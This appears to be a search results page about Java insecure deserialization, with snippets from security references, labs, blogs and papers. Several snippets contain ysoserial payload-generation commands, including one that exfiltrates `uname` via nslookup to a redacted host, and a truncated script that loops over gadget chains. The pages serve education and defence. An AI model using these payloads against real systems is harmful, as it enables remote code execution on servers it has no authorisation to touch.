GitHub
github.com › swisskyrepo › PayloadsAllTheThings › blob › master › Insecure Deserialization › Java.md
PayloadsAllTheThings/Insecure Deserialization/Java.md at master · swisskyrepo/PayloadsAllTheThings
Payload generators for the following marshallers are included: ... Multiple libraries can be used to handle JSON in Java. ... Jackson is a popular Java library used for working with JSON (JavaScript Object Notation) data. Jackson-databind supports Polymorphic Type Handling (PTH), formerly known as "Polymorphic Deserialization", which is disabled by default.
Author swisskyrepo
Payloads All The Things
swisskyrepo.github.io › PayloadsAllTheThings › Insecure Deserialization › Java
Java Deserialization - Payloads All The Things
Payload generators for the following marshallers are included: Multiple libraries can be used to handle JSON in Java. ... Jackson is a popular Java library used for working with JSON (JavaScript Object Notation) data. Jackson-databind supports Polymorphic Type Handling (PTH), formerly known as "Polymorphic Deserialization", which is disabled by default.
GitHub
github.com › frohoff › ysoserial
GitHub - frohoff/ysoserial: A proof-of-concept tool for generating payloads that exploit unsafe Java object deserialization. · GitHub
A proof-of-concept tool for generating payloads that exploit unsafe Java object deserialization. - frohoff/ysoserial
Coalfire
coalfire.com › home › coalfire articles › exploiting blind java deserialization with burp and ysoserial
Exploiting Blind Java Deserialization with Burp and… | Coalfire
February 18, 2025 - import os import re import base64 import urllib payloads = ['BeanShell1', 'Clojure', 'CommonsBeanutils1', 'CommonsCollections1', 'CommonsCollections2', 'CommonsCollections3', 'CommonsCollections4', 'CommonsCollections5', 'CommonsCollections6', 'Groovy1', 'Hibernate1', 'Hibernate2', 'JBossInterceptors1', 'JRMPClient', 'JSON1', 'JavassistWeld1', 'Jdk7u21', 'MozillaRhino1', 'Myfaces1', 'ROME', 'Spring1', 'Spring2'] def generate(name, cmd): for payload in payloads: final = cmd.replace('REPLACE', payload) print 'Generating ' + payload + ' for ' + name + '...' command = os.popen('java -jar ../ysoser
PortSwigger
portswigger.net › web-security › deserialization › exploiting › lab-deserialization-exploiting-java-deserialization-with-apache-commons
Lab: Exploiting Java deserialization with Apache Commons | Web Security Academy
For example: java -jar ysoserial-all.jar \ --add-opens=java.xml/com.sun.org.apache.xalan.internal.xsltc.trax=ALL-UNNAMED \ --add-opens=java.xml/com.sun.org.apache.xalan.internal.xsltc.runtime=ALL-UNNAMED \ --add-opens=java.base/java.net=ALL-UNNAMED \ --add-opens=java.base/java.util=ALL-UNNAMED \ [payload] '[command]'
Google Cloud
cloud.google.com › blog › topics › threat-intelligence › hunting-deserialization-exploits
Now You Serial, Now You Don’t — Systematically Hunting for Deserialization Exploits | Google Cloud Blog
March 25, 2024 - Projects such as YSoSerial (Java) and YSoSerial .NET (C#) consolidate public research on successful gadget chains for common libraries and make it easy for anyone to generate a payload with one of these chains. This is then encoded and can be passed to servers with deserialization bugs.
OWASP Cheat Sheet Series
cheatsheetseries.owasp.org › cheatsheets › Deserialization_Cheat_Sheet.html
Deserialization - OWASP Cheat Sheet Series
If the application knows before deserialization which messages will need to be processed, it could sign them as part of the serialization process. The application could then choose not to deserialize any message which didn't have an authenticated signature. ... A proof-of-concept tool for generating payloads that exploit unsafe Java object deserialization.
Techbrunch
techbrunch.github.io › patt-mkdocs › Insecure Deserialization › Java
Java Deserialization - Payloads All The Things
java -jar ysoserial.jar CommonsCollections1 calc.exe > commonpayload.bin
java -jar ysoserial.jar Groovy1 calc.exe > groovypayload.bin
java -jar ysoserial-master-v0.0.4-g35bce8f-67.jar Groovy1 'ping 127.0.0.1' > payload.bin
java -jar ysoserial.jar Jdk7u21 bash -c 'nslookup `uname`.[redacted]' | gzip | base64
PortSwigger
portswigger.net › web-security › deserialization › exploiting
Exploiting insecure deserialization vulnerabilities | Web Security Academy
If it does, you can be sure that deserialization occurred on your target. JRMPClient is another universal chain that you can use for initial detection. It causes the server to try establishing a TCP connection to the supplied IP address. Note that you need to provide a raw IP address rather than a hostname. This chain may be useful in environments where all outbound traffic is firewalled, including DNS lookups. You can try generating payloads with two different IP addresses: a local one and a firewalled, external one.
K logix
klogixsecurity.com › scorpion-labs-blog › gadget-chains
Java Deserialization Gadget Chains
May 22, 2024 - I will walk through the CommonsCollections1 gadget chain from Ysoserial, probably the most well-known tool for Java deserialization attacks. It's best to read this article with some understanding of what Java reflection is. So, I invite you to do a little research into that if you are unfamiliar. It's also important to note that this is a very old payload, so I will be referring to the code from JDK 1.8.0_60.
HackTricks
book.hacktricks.xyz › pentesting-web › deserialization
Deserialization | HackTricks
August 12, 2024 - The main tool to exploit Java deserialization is ysoserial (download here). You can also consider using ysoserial-modified, which will allow you to use complex commands (with pipes, for example). Note that this tool is focused on exploiting ObjectInputStream. I would start using the "URLDNS" payload before an RCE payload to test if the injection is possible.
Snyk Learn
learn.snyk.io › home › security education › insecure deserialization | tutorials & examples
Insecure Deserialization | Tutorials & Examples | Snyk Learn
March 25, 2022 - A critical condition for insecure deserialization is that the hacker can force the server to deserialize objects of any type. The hacker can then send payloads with objects instantiated from gadget classes.
GitHub
github.com › GrrrDog › Java-Deserialization-Cheat-Sheet
GitHub - GrrrDog/Java-Deserialization-Cheat-Sheet: The cheat sheet about Java Deserialization vulnerabilities · GitHub
javassist:3.12.1.GA, weld-core:1.1.33.Final, cdi-api:1.0-SP1, javax.interceptor-api:3.1, jboss-interceptor-spi:2.0.0.Final, slf4j-api:1.7.21
GitHub
github.com › Jake-Schoellkopf › Insecure-Java-Deserialization
GitHub - Jake-Schoellkopf/Insecure-Java-Deserialization · GitHub
Specifically, it controls how the library includes type information when serializing Java objects into JSON format and how it uses type information when deserializing JSON back into Java objects. With default typing enabled, an attacker can craft malicious JSON payloads that specify arbitrary Java classes for deserialization.
Author Jake-Schoellkopf
ACM Digital Library
dl.acm.org › doi › 10.1145 › 3554732
An In-depth Study of Java Deserialization Remote-Code Execution Exploits and Vulnerabilities | ACM Transactions on Software Engineering and Methodology
Executing these requests makes it possible to detect whether the web server is vulnerable to known attacks. If one of the payloads is executed, it means that a vulnerability has been triggered and that the web server needs to be patched. Frohoff et al. [22] have implemented the ysoserial tool, which provides 34 publicly available Java deserialization payloads.
MDPI
mdpi.com › 2079-9292 › 15 › 5 › 954
LLM-JDFuzz: A Large Language Model-Based Automated Java Deserialization Payload Generation Framework
February 26, 2026 - This paper presents LLM-JDFuzz, the framework that leverages Large Language Models for automated Java deserialization payload generation. By reframing payload generation as a constraint-aware code synthesis problem, LLM-JDFuzz introduces three key innovations: (1) an Autoprompting engine that ...